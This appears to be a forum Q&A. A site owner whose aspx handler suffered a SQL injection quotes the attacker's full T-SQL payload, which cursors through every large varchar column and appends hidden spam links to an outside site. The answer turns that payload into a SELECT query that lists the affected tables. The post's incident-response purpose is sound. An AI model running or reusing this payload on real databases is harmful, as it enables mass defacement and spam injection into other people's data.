Find the tables affected by SQL injection
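Recently, we found that one of our aspx handlers was the target of a SQL injection attack. What made it possible was the fact that we were taking a substring of the URL, starting at index X and running to the end of the URL string, and then matching it against records in our database, which made it easy for the attackers.
Here is an example of the injection they performed: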
;declare @c cursor;
declare @d varchar(4000);
set @c=cursor
for select
'update ['+TABLE_NAME+']
set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7
when 0 then ''''+char(60)+''div style="display:none"''+char(62)
+''are abortions safe ''
+char(60)+''a href="http:''+char(47)+char(47)
+''www.ooblong.com''+char(47)+''blog''+char(47)
+''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"''
+char(62)+case ABS(CHECKSUM(NewId()))%3
when 0 then ''reasons against abortion''
when 1 then ''pregnant abortion''
else ''pill for pregnancy termination'' end
+char(60)+char(47)+''a''+char(62)+'' how much does a abortion cost''
+char(60)+char(47)+''div''+char(62)+'''' else '''' end'
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin exec (@d);
fetch next from @c into @d;
end;
close @c--
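We have made sure that our aspx handler rejects such requests. Now we want to find out which tables were affected by this attack. We found at least 2 tables that were affected, but we are afraid there are more. How can we reverse engineer the SQL above to find out which tables it affected?
Just take the query you showed and remove all the unnecessary details about the attack itself, and you get: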
SELECT TABLE_NAME, COLUMN_NAME
FROM sysindexes AS i
INNER JOIN sysobjects AS o
ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS
ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1)
and DATA_TYPE like '%varchar'
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
The tables and columns in the output of this query were used in the cursor and were affected by the attack you mentioned.